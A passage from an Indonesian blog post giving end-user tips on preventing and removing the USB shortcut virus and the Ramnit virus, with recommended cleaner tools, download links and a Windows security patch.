2. Install software third party misal Tweak UI atau Magic Tweak untuk mendisable autorun dan mencegah teraktivasinya file-file .inf. Mungkin pada Windows XP Professional, proses menon-aktifkan autorun bisa dilakukan dengan mudah, namun pada versi Win XP Home, anda memerlukan software ini. Tambahan informasi, program MagicTweak selain berfungsi menon-aktifkan autorn dapat juga digunakan untuk mencegah dijalankannya file-file .inf File autorun.inf yang biasanya merupakan awal dari berjangkitnya virus akan secara otomatis diubah menjadi murni file txt alias notepad oleh program ini dan dia tidak lagi bisa dieksekusi. Ini sangat membantu jika memang secara tidak sengaja kita mengaktifkan atau mengeksekusi autorun.inf meski proses autorun sudah didisable untuk semua drive (termasuk flash disk).
3. Setelah semua proses instalasi windows, driver, program, dan lain-lain telah selesai, segera backup image system anda menggunakan software macam Acronis True Image atau Norton Ghost, sehingga jika nanti ada masalah yang tidak dapat anda selesaikan dengan mudah, anda dapat merestoreasi backup system tersebut.
4. Jika perlu, instal juga Deep Freeze apabila komputer anda digunakan oleh banyak orang, sehingga settingan komputer tidak akan berubah-ubah.
5. Update info: Ciri-ciri virus terdapatnya virus shortcut pada flashdisk dapat diketahui dengan perbedaan icon flashdisk tersebut yang biasanya berbentuk seperti icon drive menjadi berubah seperti icon folder. Jika menemui icon seperti ini, berarti dalam flashdisk tersebut terdapat virus. Gunakan explorer dan buka flashdisk lewat explorer (jangan klik 2x dari my computer) dan hapus file autorun dan file2 tersangka virus lainnya secara manual dengan menekan shift + DEL (supaya tidak tersangkut di recycle bin). Rata-rata virus lokal dapat dicegah dengan cara manual seperti ini asalkan OPSI DISABLE AUTORUN pada windows dan/atau MagicTweak telah diaktifkan, dan juga OPSI DISABLE .INF FILE pada MagicTweak telah diaktifkan.
Nah, itu mungkin sedikit tips cara menghapus virus shortcut dan smoga komputer kamu setelah hapus virus shortcut jadi bebas deh dari virus shortcut.
Cara Membasmi Virus Ramnit
Cyber4rt | 10 April 2012 | 3:58 PM
Cara membasmi Ramnit Dengan Tuntas :
- Putuskan hubungan komputer dari jaringan guna mencegah infeksi ulang.
- Gunakan tools Chanet Splitter II jika anda ingin membuat komputer anda kebal dari Ramnit dengan satu tombol sekaligus memperbaiki file HTM/HTML yang di injeksi oleh Ramnit dan tidak dapat dibersihkan / di delete oleh antivirus / virus cleaner lain. Download Chanet Splitter II dari
http://www.vaksin.com/2011/0811/immune from ramnit/CHANET SPLITTERII.exe
PENTING !!!
Berikut beberapa kelebihan yang dimiliki oleh CHANET SPLITTER II adalah : (lihat gambar)
- Tetap GRATIS .
- Mampu mencari dan mematikan proses Ramnit yang aktif di memori secara otomatis pada saat CHANET SPLITTER di jalankan
- Mampu memperbaiki registri yang diubah oleh virus
- Mampu menghapus file induk Ramnit
- Proteksi PC agar kebal dari Ramnit
- Proteksi agar Ramnit tidak membuat file virus ke USB Flash
- Mencari dan memperbaiki file HTM/HTML yang terinfeksi Ramnit
Gambar : Chanet Splitter II, mampu memperbaiki file HTM/HTML yang terinfeksi Ramnit
Chanet Splitter II dibuat dengan itikad baik membantu para pengguna komputer yang mengalami masalah dengan Ramnit. PT. Vaksincom sudah melakukan pengetesan tools ini pada banyak komputer dengan OS berbeda seperti Windows XP, Windows Vista dan Windows 7 dan tidak menemukan masalah dan tools ini dapat berjalan dengan baik pada OS-OS tersebut di test lab kami. TETAPI tidak tertutup kemungkinan tools yang kami buat tidak kompatible dengan OS yang anda gunakan dan dapat menyebabkan ketidakstabilan sistem atau kehilangan data. Karena itu demi keamanan data anda kami harapkan anda melakukan backup atas data anda di komputer dengan baik dan benar. PT. Vaksincom dan pembuat tools ini tidak bertanggungjawab atas kerugian apapun yang disebabkan baik secara langsung atau tidak langsung atas penggunaan tools ini.
- Tools yang Kami sertakan ini HANYA digunakan untuk memperbaiki file HTM/HTML yang telah terinfeksi Ramnit saja. Untuk membersihkan file EXE / DLL di dalam sistem komputer yang sudah terinfeksi Ramnit anda dapat menggunakan Norman Ramnit Cleaner (pembersih khusus Ramnit) atau Norman Malware Cleaner yang dapat di http://www.vaksin.com/2011/0811/immune from ramnit/Norman_Ramnit_Cleaner.exe kemudian scan Full HDD termasuk Removable Media (USB Flash/HDD Eksternal) dengan menggunakan antivirus yang terupdate untuk membersihkan file EXE / DLL yang sudah terinfeksi. Jika Norman Ramnit Cleaner sudah kadaluarsa, silahkan download Norman Malware Cleaner yang dapat membasmi semua virus (bukan hanya Ramnit) dari http://normanasa.vo.llnwd.net/o29/public/Norman_Malware_Cleaner.exe
- Sangat disarankan untuk instal security patch Windows (MS10-046 KB2286198) ( http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx )
salam,
Aj Tau
